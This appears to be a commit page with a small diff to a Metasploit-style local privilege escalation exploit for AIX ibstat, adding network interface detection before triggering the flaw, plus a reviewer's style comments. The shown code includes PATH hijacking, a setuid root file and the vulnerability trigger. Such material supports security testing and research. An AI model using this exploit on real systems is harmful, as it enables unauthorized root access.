Land #3384, AIX ibstat exploit interface detection

bug/bundler_fix
William Vu 2014-05-22 16:24:02 -05:00
commit dc7ec450da
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 15 additions and 1 deletions


@ -110,8 +110,22 @@ chmod 4555 #{root_file}
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
cmd_exec("export PATH") cmd_exec("export PATH")
print_status("Finding interface name...")
iface = ""
cmd_exec("lsdev -Cc if").each_line do |line|
if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/)
iface = line.split(/\s+/)[0]
print_status("Found interface #{iface}.")
break
end
end
if iface == ""
iface = "en0"
print_status("Found no interface, defaulting to en0.")
end
print_status("Triggering vulnerablity...") print_status("Triggering vulnerablity...")
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null")
# The $PATH variable must be restored before the payload is executed # The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained # in cases where an euid root shell was gained
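Review bot: The value interpolated into the `ibstat` command line is taken with `line.split(/\s+/)[0]` rather than from the pattern that validated the line, so the constraint on `iface` (lowercase letters followed by digits) is only implicit. Capturing the name in the match keeps the validated text and the interpolated text the same thing: `if (m = line.match(/^([a-z]+[0-9]+)\s+Available/)) && m[1] !~ /^lo[0-9]/` followed by `iface = m[1]`. The same condition uses `and not`, whose low precedence is easy to misread; `&& !` is the usual form, and `iface.empty?` reads better than `iface == ""`. A short comment above the loop saying that `iface` comes from command output and is limited to that pattern before it reaches `cmd_exec` would also help the next reader. The enclosing method starts and ends outside the hunk.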